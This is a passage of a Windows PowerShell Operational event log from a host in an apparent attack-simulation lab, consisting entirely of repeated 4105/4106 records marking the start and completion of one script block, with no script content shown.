SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475551
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475550
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475549
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475548
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475547
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475546
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475545
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475544
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475543
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475542
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475541
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475540
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475539
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475538
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475537
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475536
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475535
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475534
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475533
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475532
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475531
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475530
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475529
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475528
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475527
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475526
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475525
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475524
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475523
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475522
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475521
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475520
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475519
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475518
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475517
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475516
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475515
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475514
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475513
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475512
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475511
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475510
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475509
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475508
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475507
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475506
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475505
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475504
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475503
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475502
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475501
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475500
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475499
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475498
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475497
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
